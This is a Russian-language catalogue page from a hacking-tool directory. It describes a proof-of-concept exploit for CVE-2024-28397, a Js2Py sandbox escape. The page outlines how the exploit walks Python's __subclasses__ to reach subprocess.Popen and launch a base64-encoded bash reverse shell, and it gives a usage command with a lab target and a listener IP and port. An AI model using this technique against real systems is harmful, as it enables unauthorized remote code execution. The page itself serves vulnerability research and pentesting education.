Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-28397-Js2Py-RCE — Этот репозиторий содержит доказательство концепции (PoC) для CVE-2024-28397, уязвимости в библиотеке js2py, позволяющей выполнить обход песочницы для достижения удаленного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHub
d3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Этот репозиторий содержит доказательство концепции (PoC) для CVE-2024-28397, уязвимости в библиотеке js2py, позволяющей выполнить обход песочницы для достижения удаленного выполнения кода.

Репозиторий
91 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-28397-Js2Py-RCE

Описание

Этот репозиторий содержит Proof of Concept (PoC) на Python для уязвимости CVE-2024-28397, представляющей собой побег из песочницы в интерпретаторе JavaScript Js2Py для Python. Когда целевое приложение выполняет непроверенный JS-код через Js2Py, злоумышленник может выйти из песочницы и выполнить произвольный Python-код. Это можно использовать для получения удалённого выполнения кода (RCE) и обратной оболочки на уязвимой системе.

Данный эксплойт вдохновлён проектом Marven11 CVE-2024-28397-js2py-Sandbox-Escape.


Отказ от ответственности

Этот скрипт предоставляется исключительно для образовательных целей и санкционированного тестирования на проникновение. Несанкционированное использование этого скрипта против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным. Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим скриптом.


Об уязвимости

  • CVE ID: CVE-2024-28397
  • Компонент: побег из песочницы Js2Py
  • Воздействие: неограниченный доступ к объектной модели Python через __class__.__base__.__subclasses__, приводящий к произвольному выполнению кода
  • Вектор атаки: удалённый (через открытый HTTP-интерфейс, выполняющий управляемый пользователем JavaScript)

Возможности

  • Автоматическая доставка полезной нагрузки обратной оболочки через RCE в Python
  • Выполнение shell-команд, закодированных в Base64 (встроенная поддержка)
  • Встроенный слушатель обратной оболочки с базовой PTY-стабилизацией
  • Чистое форматирование вывода
  • Лёгкий и не требует дополнительных зависимостей (кроме requests)

Требования

  • Python 3.x
  • Модуль requests (pip install requests)
  • Система Linux (для обратной оболочки через /dev/tcp)
  • Цель, запускающая уязвимую реализацию Js2Py

Использование

python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target: Полный URL-адрес уязвимой конечной точки веб-приложения
  • --lhost: Ваш локальный IP-адрес (используется для обратной оболочки)
  • --lport: Ваш локальный порт для приёма оболочки

Как это работает

  1. Скрипт подготавливает обратную оболочку Bash, кодирует её в Base64 и внедряет в полезную нагрузку JavaScript.
  2. JS-полезная нагрузка обходит дерево объектов Python с помощью __class__.__base__.__subclasses__(), чтобы найти subprocess.Popen.
  3. Использует Popen для декодирования и выполнения оболочки.
  4. Машина атакующего получает обратную оболочку и автоматически её стабилизирует.
Скачать инструмент